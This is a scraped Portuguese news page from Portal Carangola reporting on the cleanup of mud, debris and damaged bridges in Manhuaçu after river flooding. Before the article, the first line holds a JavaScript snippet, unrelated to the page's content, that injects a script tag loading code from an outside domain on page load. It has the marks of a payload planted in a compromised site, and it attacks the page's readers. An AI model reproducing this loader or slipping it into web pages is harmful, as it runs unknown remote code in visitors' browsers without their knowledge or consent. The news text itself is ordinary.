;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Começa a limpeza em Manhuaçu - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Começa a limpeza em Manhuaçu

Limpeza em Manhuaçu
Limpeza em Manhuaçu

Moradores e comerciantes começam a limpeza de casas e comércios em toda a cidade de Manhuaçu. Como o nível das águas baixa lentamente, funcionários e moradores aproveitam para retirar lama, lixo e sujeira que se acumularam desde a noite de terça-feira. Ninguém retornou para casas ou lojas ainda.
Em várias pontes e ruas, o cenário é de destruição. Moradores com vassouras, baldes e enxadas limpam seus imóveis e tentam reduzir a sujeira nas ruas. A grande quantidade de poeira e o mau cheiro também incomodam.

Para ter dimensão do problema, na ponte do Ginásio (rua Alencar Soares Vargas), a força das águas arrancou parte do asfaltou, levou duas partes do guarda-corpo da ponte e derrubou muros e paredes de casas nas margens do rio.

Troncos de árvores, bananeiras, galhos e tudo quanto é tipo de objetos. Nas pontes e cercas, o cenário de muita sujeira e lixo carregados pelas águas do rio Manhuaçu. Em várias ruas, móveis e outros objetos danificados são colocados nas calçadas, enquanto máquinas e caminhões da prefeitura fazem a limpeza.

portalcaparao.com.br

Jailton Pereira – 09/01/09 – 13:11 – portalcaparao@gmail.com

Ofertas: dvdgravadores

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.